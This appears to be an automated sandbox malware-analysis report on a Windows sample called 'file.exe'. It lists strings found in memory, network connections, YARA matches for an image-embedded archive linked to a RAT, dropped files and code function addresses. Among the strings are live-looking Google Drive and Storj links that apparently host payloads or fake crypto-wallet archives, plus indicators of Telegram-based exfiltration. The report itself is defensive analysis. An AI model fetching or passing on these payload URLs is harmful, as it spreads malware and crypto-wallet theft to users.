Source: file.exe, 00000002.00000003.1361033757.0000012D10328000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1361088766.0000012D1032A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1360996024.0000012D1031E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://clients2.google.com/service/update2/crxX
Source: file.exe, 00000000.00000003.1354224937.0000023218911000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1354061434.0000023218911000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1354379801.0000023218915000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://clients2.google.com/service/update2/crxm
Source: file.exe, 00000002.00000003.1361274764.0000012D10306000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://clients2.google.com/service/update2/crxtin
Source: file.exe, 00000002.00000003.1361452113.0000012D1034E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/
Source: file.exe, 00000002.00000003.1361292295.0000012D1032B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive-autopush.corp.google.com/
Source: file.exe, 00000002.00000003.1361292295.0000012D1032B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive-daily-0.corp.google.com/
Source: file.exe, 00000002.00000003.1361292295.0000012D1032B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive-daily-1.corp.google.com/
Source: file.exe, 00000002.00000003.1464989617.0000012D10328000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive-daily-2.corp.google.co
Source: file.exe, 00000002.00000003.1361292295.0000012D1032B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive-daily-2.corp.google.com/
Source: file.exe, 00000002.00000003.1361292295.0000012D1032B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive-daily-3.corp.google.com/
Source: file.exe, 00000002.00000003.1361292295.0000012D1032B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive-daily-4.corp.google.com/
Source: file.exe, 00000002.00000003.1361292295.0000012D1032B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive-daily-5.corp.google.com/
Source: file.exe, 00000002.00000003.1361292295.0000012D1032B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive-daily-6.corp.google.com/
Source: file.exe, 00000002.00000003.1361292295.0000012D1032B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive-preprod.corp.google.com/
Source: file.exe, 00000000.00000002.1490397342.0000023218906000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive-staging.corp.google.co
Source: file.exe, 00000002.00000003.1361292295.0000012D1032B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive-staging.corp.google.com/
Source: file.exe, 00000000.00000003.1353854851.00000232188FF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1353831153.00000232188F3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.co
Source: file.exe, 00000002.00000003.1361452113.0000012D1034E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/
Source: file.exe	String found in binary or memory: https://drive.google.com/uc?id=
Source: file.exe, 00000002.00000002.1503968722.0000012D10359000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=download
Source: file.exe, 00000002.00000003.1464989617.0000012D10359000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000002.1503968722.0000012D10359000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=downloadB(
Source: file.exe, 00000002.00000002.1503968722.0000012D102E2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=download~NJ
Source: file.exe	String found in binary or memory: https://drive.google.com/uc?id=URL:
Source: file.exe, 00000000.00000003.1441377935.000002321892D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1463728013.000002321892D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1490397342.000002321892D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/w
Source: file.exe, 00000002.00000003.1464255067.0000012D10393000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000002.1503968722.0000012D10374000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/
Source: file.exe, 00000002.00000002.1503968722.0000012D10304000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1464989617.0000012D10328000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/Agent:
Source: file.exe, 00000002.00000003.1464989617.0000012D10359000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/T)
Source: file.exe, 00000002.00000003.1464989617.0000012D10371000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1464885249.0000012D103AB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1464885249.0000012D10393000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1464255067.0000012D103AB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1464739332.0000012D103BA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1389602799.0000012D10393000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1464255067.0000012D10393000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000002.1503968722.0000012D103BA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000002.1503968722.0000012D10369000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1464255067.0000012D103BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=download
Source: file.exe, 00000000.00000003.1441284077.000002321896A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1441337400.000002321896D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=downloadK$
Source: file.exe, 00000002.00000003.1464739332.0000012D103BA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000002.1503968722.0000012D103BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=downloadb
Source: file.exe, 00000002.00000003.1464739332.0000012D103BA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000002.1503968722.0000012D103BA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1464255067.0000012D103BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=downloadi
Source: file.exe, 00000002.00000003.1464989617.0000012D10328000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/load_g
Source: file.exe, 00000000.00000003.1461383595.0000023218964000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1462458747.000002321896D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1490397342.0000023218955000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000002.1503968722.0000012D10304000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000002.1503968722.0000012D103BA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000002.1503968722.0000012D10369000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000002.1503968722.0000012D10374000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io/
Source: file.exe, 00000000.00000003.1461383595.0000023218964000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1490397342.0000023218955000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io/&
Source: file.exe, 00000000.00000003.1463728013.000002321891C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1490397342.0000023218906000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io/S
Source: file.exe, 00000000.00000003.1461383595.0000023218964000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1462458747.000002321896D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1490397342.0000023218955000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io/W
Source: file.exe	String found in binary or memory: https://ipinfo.io/json
Source: file.exe, 00000002.00000002.1503968722.0000012D10304000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io/jsonFd
Source: file.exe, 00000002.00000002.1503968722.0000012D10304000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io/jsonJd
Source: file.exe	String found in binary or memory: https://ipinfo.io/jsonN/Aipcountry
Source: file.exe, 00000002.00000002.1503968722.0000012D10304000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io/jsonbd
Source: file.exe, 00000000.00000003.1463728013.0000023218955000.00000004.00000020.00020000.00000000.sdmp, json[1].json.2.dr, json[1].json.0.dr	String found in binary or memory: https://ipinfo.io/missingauth
Source: file.exe	String found in binary or memory: https://link.storjshare.io/s/jvbdgt4oiad73vsmb56or2qtzcta/cardan-shafts/Exodus%20(Software)(1).zip?d
Source: file.exe	String found in binary or memory: https://link.storjshare.io/s/jvrb5lh3pynx3et56bisfuuguvoq/cardan-shafts/Electrum%20(Software)(1).zip
Source: file.exe	String found in binary or memory: https://link.storjshare.io/s/jvs5vlroulyshzqirwqzg7wys2wq/cardan-shafts/Atomic%20(Software)(2).zip?d
Source: file.exe	String found in binary or memory: https://link.storjshare.io/s/jwkj6ktyi5kumzjvhrw6bdbvyceq/cardan-shafts/Ledger%20(Software).zip?down
Source: file.exe	String found in binary or memory: https://link.storjshare.io/s/jx3obcnqgxa2u364c52wel6vrxba/cardan-shafts/Trazor%20(Software).zip?down
Source: file.exe, 00000002.00000003.1361292295.0000012D1032B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1361452113.0000012D1034E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://payments.google.com/
Source: file.exe, 00000002.00000003.1361274764.0000012D10306000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1361501894.0000012D10310000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://payments.google.com/payments/v4/js/integrator.js
Source: file.exe, 00000002.00000003.1361274764.0000012D10306000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1361501894.0000012D10310000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://payments.google.com/payments/v4/js/integrator.js00F7FC9
Source: file.exe, 00000002.00000003.1361274764.0000012D10306000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1361501894.0000012D10310000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://payments.google.com/payments/v4/js/integrator.js313AE9E
Source: file.exe, 00000002.00000003.1361292295.0000012D1032B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1361452113.0000012D1034E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sandbox.google.com/
Source: file.exe, 00000002.00000003.1360968091.0000012D1030E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1361126576.0000012D10313000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sandbox.google.com/payments/v4/js/i
Source: file.exe, 00000002.00000003.1361501894.0000012D10310000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sandbox.google.com/payments/v4/js/integrator.js
Source: file.exe, 00000002.00000003.1361274764.0000012D10306000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1361501894.0000012D10310000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sandbox.google.com/payments/v4/js/integrator.jsF6DFAA4C
Source: file.exe, 00000002.00000003.1361452113.0000012D1034E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/
Source: file.exe, 00000002.00000003.1360968091.0000012D1030E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1361126576.0000012D10313000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1361147206.0000012D10318000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/;T
Source: file.exe, 00000002.00000003.1361064723.0000012D10341000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1361033757.0000012D10328000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1360996024.0000012D1031E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1361452113.0000012D1034E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/F
Source: file.exe, 00000000.00000003.1354165171.00000232188F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/om/
Source: file.exe, 00000000.00000003.1354266433.000002321891D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1354180465.000002321891C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1353854851.00000232188FF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1353888422.000002321890D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1354458754.000002321891D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1354061434.0000023218911000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/p
Source: file.exe, 00000002.00000003.1361292295.0000012D1032B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1361452113.0000012D1034E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/
Source: file.exe, 00000002.00000003.1361292295.0000012D1032B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/auth/chromewebstore
Source: file.exe, 00000002.00000003.1361274764.0000012D10306000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1361501894.0000012D10310000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/auth/chromewebstore.readonly
Source: file.exe, 00000002.00000003.1361274764.0000012D10306000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1361501894.0000012D10310000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/auth/chromewebstore.readonly7FCBCD79ema
Source: file.exe, 00000002.00000003.1361274764.0000012D10306000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1361501894.0000012D10310000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/auth/chromewebstore.readonlyCE89A621_na
Source: file.exe, 00000000.00000003.1353854851.00000232188FF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1353888422.000002321890D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1354224937.0000023218911000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1354061434.0000023218911000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1354379801.0000023218915000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1490397342.0000023218906000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/auth/chromewebstore1
Source: file.exe, 00000002.00000003.1361274764.0000012D10306000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/auth/chromewebstore58EE5
Source: file.exe, 00000002.00000003.1361033757.0000012D10328000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1361088766.0000012D1032A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1360996024.0000012D1031E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/auth/chromewebstoreP
Source: file.exe, 00000002.00000003.1361292295.0000012D1032B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/auth/sierra
Source: file.exe, 00000000.00000003.1353854851.00000232188FF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1353888422.000002321890D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/auth/sierra)
Source: file.exe, 00000002.00000003.1361033757.0000012D10328000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1361088766.0000012D1032A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1360996024.0000012D1031E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/auth/sierra8
Source: file.exe, 00000002.00000003.1361274764.0000012D10306000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/auth/sierra9C39B082BD9B3
Source: file.exe, 00000002.00000003.1361292295.0000012D1032B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/auth/sierrasandbox
Source: file.exe, 00000002.00000003.1361274764.0000012D10306000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/auth/sierrasandbox8D3D5EeB

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746

Source: unknown	HTTPS traffic detected: 172.217.17.46:443 -> 192.168.2.9:49717 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.17.46:443 -> 192.168.2.9:49718 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.181.65:443 -> 192.168.2.9:49724 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.181.65:443 -> 192.168.2.9:49725 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.9:49740 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.9:49747 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.9:49746 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.9:49749 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\output[1].png, type: DROPPED	Matched rule: Detects images embedding archives. Observed in TheRat RAT. Author: ditekSHen
Source: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\output[1].png, type: DROPPED	Matched rule: Detects images embedding archives. Observed in TheRat RAT. Author: ditekSHen
Source: C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f, type: DROPPED	Matched rule: Detects images embedding archives. Observed in TheRat RAT. Author: ditekSHen

Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\output[1].png	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\json[1].json	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\sendMessage[1].json	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

File deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\output[1].png

Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF7ABC13CE0	0_2_00007FF7ABC13CE0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF7ABC07C50	0_2_00007FF7ABC07C50
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF7ABC09B00	0_2_00007FF7ABC09B00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF7ABC0CA90	0_2_00007FF7ABC0CA90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF7ABC06970	0_2_00007FF7ABC06970
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF7ABC110F0	0_2_00007FF7ABC110F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF7ABC15EC0	0_2_00007FF7ABC15EC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF7ABC05D60	0_2_00007FF7ABC05D60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF7ABC14D20	0_2_00007FF7ABC14D20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF7ABC3E440	0_2_00007FF7ABC3E440
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF7ABC183F0	0_2_00007FF7ABC183F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF7ABC5D2C8	0_2_00007FF7ABC5D2C8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF7ABC5E170	0_2_00007FF7ABC5E170
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF7ABC06190	0_2_00007FF7ABC06190
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF7ABC0E790	0_2_00007FF7ABC0E790
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF7ABC0B600	0_2_00007FF7ABC0B600
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF7ABC5ACDC	0_2_00007FF7ABC5ACDC
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF7ABC4ACDC	0_2_00007FF7ABC4ACDC
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF7ABC34D10	0_2_00007FF7ABC34D10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF7ABC36CB0	0_2_00007FF7ABC36CB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF7ABC54C10	0_2_00007FF7ABC54C10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF7ABC4EAF8	0_2_00007FF7ABC4EAF8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF7ABC5DAD4	0_2_00007FF7ABC5DAD4
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF7ABC01A20	0_2_00007FF7ABC01A20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF7ABC2EA20	0_2_00007FF7ABC2EA20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF7ABC09030	0_2_00007FF7ABC09030
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF7ABC52040	0_2_00007FF7ABC52040
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF7ABC01000	0_2_00007FF7ABC01000
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF7ABC28010	0_2_00007FF7ABC28010
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF7ABC4F004	0_2_00007FF7ABC4F004
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF7ABC31F30	0_2_00007FF7ABC31F30
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF7ABC50F30	0_2_00007FF7ABC50F30
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF7ABC12EF0	0_2_00007FF7ABC12EF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF7ABC5FDA0	0_2_00007FF7ABC5FDA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF7ABC5ED1C	0_2_00007FF7ABC5ED1C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF7ABC53D40	0_2_00007FF7ABC53D40
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF7ABC0E4AA	0_2_00007FF7ABC0E4AA
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF7ABC4A494	0_2_00007FF7ABC4A494
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF7ABC3D410	0_2_00007FF7ABC3D410
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF7ABC383A0	0_2_00007FF7ABC383A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF7ABC013D0	0_2_00007FF7ABC013D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF7ABC652F0	0_2_00007FF7ABC652F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF7ABC62298	0_2_00007FF7ABC62298
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF7ABC4A290	0_2_00007FF7ABC4A290
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF7ABC4B1E4	0_2_00007FF7ABC4B1E4
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF7ABC5A1C8	0_2_00007FF7ABC5A1C8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF7ABC121C0	0_2_00007FF7ABC121C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF7ABC30190	0_2_00007FF7ABC30190
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF7ABC2F910	0_2_00007FF7ABC2F910
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF7ABC0D8A6	0_2_00007FF7ABC0D8A6
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF7ABC518B8	0_2_00007FF7ABC518B8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF7ABC09830	0_2_00007FF7ABC09830
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF7ABC017A0	0_2_00007FF7ABC017A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF7ABC297C0	0_2_00007FF7ABC297C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF7ABC63774	0_2_00007FF7ABC63774
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF7ABC35720	0_2_00007FF7ABC35720
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF7ABC6070C	0_2_00007FF7ABC6070C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF7ABC4A698	0_2_00007FF7ABC4A698
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF7ABC386C0	0_2_00007FF7ABC386C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF7ABC5A65C	0_2_00007FF7ABC5A65C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF7ABC5D544	0_2_00007FF7ABC5D544
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Code function: 4_2_00007FF6A22F3990	4_2_00007FF6A22F3990
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Code function: 4_2_00007FF6A23073E8	4_2_00007FF6A23073E8
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Code function: 4_2_00007FF6A2303BD0	4_2_00007FF6A2303BD0
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Code function: 4_2_00007FF6A22F4C00	4_2_00007FF6A22F4C00
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Code function: 4_2_00007FF6A23114A4	4_2_00007FF6A23114A4
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Code function: 4_2_00007FF6A22F54C0	4_2_00007FF6A22F54C0
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Code function: 4_2_00007FF6A23081A4	4_2_00007FF6A23081A4
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Code function: 4_2_00007FF6A23129B4	4_2_00007FF6A23129B4
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Code function: 4_2_00007FF6A230E200	4_2_00007FF6A230E200
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Code function: 4_2_00007FF6A230FA54	4_2_00007FF6A230FA54
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Code function: 4_2_00007FF6A2305B14	4_2_00007FF6A2305B14
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Code function: 4_2_00007FF6A230EDA0	4_2_00007FF6A230EDA0
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Code function: 4_2_00007FF6A22FCD7C	4_2_00007FF6A22FCD7C

